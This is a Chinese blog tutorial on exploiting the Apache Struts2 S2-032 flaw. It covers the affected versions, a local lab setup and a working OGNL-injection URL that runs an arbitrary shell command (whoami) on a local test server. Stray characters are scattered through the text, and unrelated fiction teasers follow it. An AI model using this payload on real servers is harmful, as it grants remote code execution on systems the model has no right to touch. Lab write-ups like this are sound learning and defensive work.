Struts-S2-032漏洞利用(含環(huán)境搭建砖茸、含POC)

Struts –s2-32

此文僅供大家交流學習欺冀,嚴禁非法使用

一蹄葱、參考網址:

http://www.cnblogs.com/mrchang/p/6501428.html
https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-032

二、 影響版本:

Struts 2.3.20 - Struts Struts 2.3.28(2.3.20.3和2.3.24.3除外)

三究西、 漏洞介紹:

當啟用動態(tài)方法調用時窗慎,可以傳遞可用于在服務器端執(zhí)行任意代碼的惡意表達式。
method:<name> Action 前綴去調用聲明為 public 的函數(shù)卤材,只不過在低版本中 Strtus2 不會對 name 方法值做 OGNL 計算遮斥,而在高版本中會。.

四扇丛、 環(huán)境搭建:

下載地址:http://archive.apache.org/dist/struts/2.3.24/
百度云鏈接:鏈接:http://pan.baidu.com/s/1dFeUyNv 密碼:279t

  • 下載安裝xampp

  • 部署showcase

1.png
  • 解壓
2.png
  • 復制到
3.png

重啟tomcat


4.png
  • 已成功自動部署
5.png
  • 將struts.xml修改
1.png

搭建linux環(huán)境建議使用參考網站的docker環(huán)境

五伏伐、 POC:

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

六、 測試網址:

原始網址:

http://127.0.0.1:8080/struts2-showcase/home.action

修改后網址:

http://127.0.0.1:8080/struts2-showcase/home.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

七晕拆、執(zhí)行結果

2.png

八藐翎、 至此,該漏洞基本利用完畢

本人還是一個未畢業(yè)的小萌新实幕,希望大家多多幫助吝镣,有問題請發(fā)送郵件到xrzsupupup@163.com不勝感激,我也會盡量去幫助大家

堅決做一名白帽子

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末昆庇,一起剝皮案震驚了整個濱河市末贾,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌整吆,老刑警劉巖拱撵,帶你破解...
    沈念sama閱讀 219,270評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異表蝙,居然都是意外死亡拴测,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,489評論 3 395
  • 文/潘曉璐 我一進店門府蛇,熙熙樓的掌柜王于貴愁眉苦臉地迎上來集索,“玉大人,你說我怎么就攤上這事汇跨∥窬#” “怎么了?”我有些...
    開封第一講書人閱讀 165,630評論 0 356
  • 文/不壞的土叔 我叫張陵穷遂,是天一觀的道長函匕。 經常有香客問我,道長蚪黑,這世上最難降的妖魔是什么盅惜? 我笑而不...
    開封第一講書人閱讀 58,906評論 1 295
  • 正文 為了忘掉前任中剩,我火速辦了婚禮,結果婚禮上酷窥,老公的妹妹穿的比我還像新娘咽安。我一直安慰自己,他們只是感情好蓬推,可當我...
    茶點故事閱讀 67,928評論 6 392
  • 文/花漫 我一把揭開白布妆棒。 她就那樣靜靜地躺著,像睡著了一般沸伏。 火紅的嫁衣襯著肌膚如雪糕珊。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,718評論 1 305
  • 那天毅糟,我揣著相機與錄音红选,去河邊找鬼。 笑死姆另,一個胖子當著我的面吹牛喇肋,可吹牛的內容都是我干的。 我是一名探鬼主播迹辐,決...
    沈念sama閱讀 40,442評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼蝶防,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了明吩?” 一聲冷哼從身側響起间学,我...
    開封第一講書人閱讀 39,345評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎印荔,沒想到半個月后低葫,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經...
    沈念sama閱讀 45,802評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡仍律,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,984評論 3 337
  • 正文 我和宋清朗相戀三年嘿悬,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片染苛。...
    茶點故事閱讀 40,117評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡鹊漠,死狀恐怖,靈堂內的尸體忽然破棺而出茶行,到底是詐尸還是另有隱情,我是刑警寧澤登钥,帶...
    沈念sama閱讀 35,810評論 5 346
  • 正文 年R本政府宣布畔师,位于F島的核電站,受9級特大地震影響牧牢,放射性物質發(fā)生泄漏看锉。R本人自食惡果不足惜姿锭,卻給世界環(huán)境...
    茶點故事閱讀 41,462評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望伯铣。 院中可真熱鬧呻此,春花似錦、人聲如沸腔寡。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,011評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽放前。三九已至忿磅,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間凭语,已是汗流浹背葱她。 一陣腳步聲響...
    開封第一講書人閱讀 33,139評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留似扔,地道東北人吨些。 一個月前我還...
    沈念sama閱讀 48,377評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像炒辉,于是被迫代替她去往敵國和親豪墅。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,060評論 2 355

推薦閱讀更多精彩內容